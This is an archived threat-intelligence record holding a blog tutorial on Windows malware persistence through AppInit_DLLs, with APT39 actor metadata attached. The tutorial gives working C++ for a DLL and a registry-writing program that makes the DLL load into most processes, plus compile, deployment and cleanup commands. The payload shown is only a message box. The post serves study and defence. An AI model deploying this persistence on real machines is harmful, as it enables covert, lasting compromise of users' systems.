{ "id": "0f617af3-688d-48f1-ae8f-2d240541d064", "created_at": "2026-04-06T00:14:26.759902Z", "updated_at": "2026-04-10T03:35:13.652041Z", "deleted_at": null, "sha1_hash": "2eceb6224e2cba5369d5a970f436c952bc390b47", "title": "Malware development: persistence - part 5. AppInit_DLLs. Simple C++ example.", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1916539, "plain_text": "Malware development: persistence - part 5. AppInit_DLLs. Simple\r\nC++ example.\r\nBy cocomelonc\r\nPublished: 2022-05-16 · Archived: 2026-04-05 13:49:32 UTC\r\n3 minute read\r\n﷽\r\nHello, cybersecurity enthusiasts and white hackers!\r\nThis post is a next part of a series of articles on windows malware persistence techniques and tricks.\r\nToday I’ll write about the result of my own research into another persistence trick: AppInit_DLLs.\r\nWindows operating systems have the functionality to allow nearly all application processes to load custom DLLs\r\ninto their address space. This allows for the possibility of persistence, as any DLL may be loaded and executed\r\nwhen application processes are created on the system.\r\nAppInit DLLsPermalink\r\nhttps://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html\r\nPage 1 of 11\n\nAdministrator level privileges are necessary to implement this trick. The following registry keys regulate the\r\nloading of DLLs via AppInit:\r\nHKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows - 32-bit\r\nHKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows - 64-bit\r\nWe are interested in the following values:\r\nreg query \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\" /s\r\nAnd for 64-bit :\r\nreg query \"HKLM\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\" /s\r\nhttps://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html\r\nPage 2 of 11\n\nMicrosoft to protect Windows users from malware has disabled by default the loading of DLLs’s via AppInit\r\n( LoadAppInit_DLLs ). However, setting the registry key LoadAppInit_DLLs to value 1 will enable this feature.\r\npractical examplePermalink\r\nFirst of all, create “evil” DLL. As usual I will take “meow-meow” messagebox pop-up logic:\r\n/*\r\nevil.cpp\r\ninject via Appinit_DLLs\r\nauthor: @cocomelonc\r\nhttps://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#pragma comment (lib, \"user32.lib\")\r\nextern \"C\" {\r\n __declspec(dllexport) BOOL WINAPI runMe(void) {\r\n MessageBoxA(NULL, \"Meow-meow!\", \"=^..^=\", MB_OK);\r\n return TRUE;\r\n }\r\n}\r\nBOOL APIENTRY DllMain(HMODULE hModule, DWORD nReason, LPVOID lpReserved) {\r\n switch (nReason) {\r\n case DLL_PROCESS_ATTACH:\r\n runMe();\r\n break;\r\n case DLL_PROCESS_DETACH:\r\n break;\r\n case DLL_THREAD_ATTACH:\r\n break;\r\n case DLL_THREAD_DETACH:\r\n break;\r\n }\r\n return TRUE;\r\n}\r\nLet’s go to compile it:\r\nx86_64-w64-mingw32-gcc -shared -o evil.dll evil.cpp -fpermissive\r\nhttps://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html\r\nPage 3 of 11\n\nThen simple logic: changing the registry key AppInit_DLLs to contain the path to the DLL, as a result,\r\nevil.dll will be loaded.\r\nFor this create another app pers.cpp :\r\n/*\r\npers.cpp\r\nwindows low level persistense via Appinit_DLLs\r\nauthor: @cocomelonc\r\nhttps://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#include \u003cstring.h\u003e\r\nint main(int argc, char* argv[]) {\r\n HKEY hkey = NULL;\r\n // malicious DLL\r\n const char* dll = \"Z:\\\\2022-05-16-malware-pers-5\\\\evil.dll\";\r\n // activation\r\n DWORD act = 1;\r\n // 32-bit and 64-bit\r\n LONG res = RegOpenKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)\"SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\"\r\n if (res == ERROR_SUCCESS) {\r\n // create new registry keys\r\n RegSetValueEx(hkey, (LPCSTR)\"LoadAppInit_DLLs\", 0, REG_DWORD, (const BYTE*)\u0026act, sizeof(act));\r\n RegSetValueEx(hkey, (LPCSTR)\"AppInit_DLLs\", 0, REG_SZ, (unsigned char*)dll, strlen(dll));\r\n RegCloseKey(hkey);\r\n }\r\n res = RegOpenKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)\"SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\\r\n if (res == ERROR_SUCCESS) {\r\n // create new registry keys\r\n RegSetValueEx(hkey, (LPCSTR)\"LoadAppInit_DLLs\", 0, REG_DWORD, (const BYTE*)\u0026act, sizeof(act));\r\n RegSetValueEx(hkey, (LPCSTR)\"AppInit_DLLs\", 0, REG_SZ, (unsigned char*)dll, strlen(dll));\r\nhttps://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html\r\nPage 4 of 11\n\nRegCloseKey(hkey);\r\n }\r\n return 0;\r\n}\r\nAs you can see, setting the registry key LoadAppInit_DLLs to value 1 is also important.\r\nLet’s go to compile it:\r\nx86_64-w64-mingw32-g++ -O2 pers.cpp -o pers.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-s\r\ndemoPermalink\r\nLet’s go to see everything in action! Drop all to victim’s machine ( Windows 10 x64 in my case).\r\nThen run as Administartor:\r\nand:\r\nreg query \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\" /s\r\nreg query \"HKLM\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\" /s\r\njust check.\r\nhttps://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html\r\nPage 5 of 11\n\nThen, for demonstration, open something like Paint or Notepad :\r\nhttps://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html\r\nPage 6 of 11\n\nSo, everything is worked perfectly :)\r\nsecond example:Permalink\r\nHowever, this method’s implementation may result in stability and performance difficulties on the target system:\r\nhttps://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html\r\nPage 7 of 11\n\nFurthermore, I think that the logic of the first DLL’s is considered very odd since multiple message boxes popup,\r\nso when we act real-life action in red team scenarios: it’s very noisy, for example for multiple reverse shell\r\nconnections.\r\nI tried updating little bit the logic of evil.dll :\r\n/*\r\nevil2.cpp\r\ninject via Appinit_DLLs - only for `mspaint.exe`\r\nauthor: @cocomelonc\r\nhttps://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#pragma comment (lib, \"user32.lib\")\r\nchar* subStr(char *str, char *substr) {\r\n while (*str) {\r\n char *Begin = str;\r\n char *pattern = substr;\r\n while (*str \u0026\u0026 *pattern \u0026\u0026 *str == *pattern) {\r\n str++;\r\n pattern++;\r\n }\r\n if (!*pattern)\r\n return Begin;\r\n str = Begin + 1;\r\n }\r\n return NULL;\r\n}\r\nextern \"C\" {\r\n __declspec(dllexport) BOOL WINAPI runMe(void) {\r\n MessageBoxA(NULL, \"Meow-meow!\", \"=^..^=\", MB_OK);\r\n return TRUE;\r\n }\r\n}\r\nBOOL APIENTRY DllMain(HMODULE hModule, DWORD nReason, LPVOID lpReserved) {\r\n char path[MAX_PATH];\r\n switch (nReason) {\r\n case DLL_PROCESS_ATTACH:\r\n GetModuleFileName(NULL, path, MAX_PATH);\r\n if (subStr(path, (char *)\"paint\")) {\r\n runMe();\r\n }\r\nhttps://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html\r\nPage 8 of 11\n\nbreak;\r\n case DLL_PROCESS_DETACH:\r\n break;\r\n case DLL_THREAD_ATTACH:\r\n break;\r\n case DLL_THREAD_DETACH:\r\n break;\r\n }\r\n return TRUE;\r\n}\r\nAs you can see, if the current process is paint (and is 32-bits) then, “inject” :)\r\nPerfect! :)\r\nhttps://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html\r\nPage 9 of 11\n\nFor cleanup, after end of experiments:\r\nreg add \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\" /v LoadAppInit_DLLs /d 0\r\nreg add \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\" /v AppInit_DLLs /t REG_SZ /f\r\nhttps://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html\r\nPage 10 of 11\n\nThis technique is not new, but it is worth paying attention to it, in the wild, this trick was often used by groups\r\nsuch as APT 39 and malwares as Ramsay.\r\nMITRE ATT\u0026CK: APPInit_DLLs\r\nAPT39\r\nRamsay\r\nsource code in github\r\nThis is a practical case for educational purposes only.\r\nThanks for your time happy hacking and good bye!\r\nPS. All drawings and screenshots are mine\r\nSource: https://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html\r\nhttps://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html\r\nPage 11 of 11", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html" ], "report_names": [ "malware-pers-5.html" ], "threat_actors": [ { "id": "62947fad-14d2-40bf-a721-b1fc2fbe5b5d", "created_at": "2025-08-07T02:03:24.741594Z", "updated_at": "2026-04-10T02:00:03.653394Z", "deleted_at": null, "main_name": "COBALT HICKMAN", "aliases": [ "APT39 ", "Burgundy Sandstorm ", "Chafer ", "ITG07 ", "Remix Kitten " ], "source_name": "Secureworks:COBALT HICKMAN", "tools": [ "MechaFlounder", "Mimikatz", "Remexi", "TREKX" ], "source_id": "Secureworks", "reports": null }, { "id": "bee22874-f90e-410b-93f3-a2f9b1c2e695", "created_at": "2022-10-25T16:07:23.45097Z", "updated_at": "2026-04-10T02:00:04.610108Z", "deleted_at": null, "main_name": "Chafer", "aliases": [ "APT 39", "Burgundy Sandstorm", "Cobalt Hickman", "G0087", "ITG07", "Radio Serpens", "Remix Kitten", "TA454" ], "source_name": "ETDA:Chafer", "tools": [ "ASPXSpy", "ASPXTool", "Antak", "CACHEMONEY", "EternalBlue", "HTTPTunnel", "LOLBAS", "LOLBins", "Living off the Land", "MechaFlounder", "Metasploit", "Mimikatz", "NBTscan", "NSSM", "Non-sucking Service Manager", "POWBAT", "Plink", "PuTTY Link", "Rana", "Remcom", "Remexi", "RemoteCommandExecution", "SafetyKatz", "UltraVNC", "WCE", "Windows Credential Editor", "Windows Credentials Editor", "nbtscan", "pwdump" ], "source_id": "ETDA", "reports": null }, { "id": "1b3a247f-6186-4482-8b92-c3fb2d767c7d", "created_at": "2023-01-06T13:46:38.883911Z", "updated_at": "2026-04-10T02:00:03.132231Z", "deleted_at": null, "main_name": "APT39", "aliases": [ "COBALT HICKMAN", "G0087", "Radio Serpens", "TA454", "ITG07", "Burgundy Sandstorm", "REMIX KITTEN" ], "source_name": "MISPGALAXY:APT39", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "6b6155e4-94ec-4909-b908-550afe758ad6", "created_at": "2022-10-25T15:50:23.365074Z", "updated_at": "2026-04-10T02:00:05.2978Z", "deleted_at": null, "main_name": "APT39", "aliases": [ "APT39", "ITG07", "Remix Kitten" ], "source_name": "MITRE:APT39", "tools": [ "NBTscan", "MechaFlounder", "Remexi", "CrackMapExec", "pwdump", "Mimikatz", "Windows Credential Editor", "Cadelspy", "PsExec", "ASPXSpy", "ftp" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434466, "ts_updated_at": 1775792113, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/2eceb6224e2cba5369d5a970f436c952bc390b47.pdf", "text": "https://archive.orkl.eu/2eceb6224e2cba5369d5a970f436c952bc390b47.txt", "img": "https://archive.orkl.eu/2eceb6224e2cba5369d5a970f436c952bc390b47.jpg" } }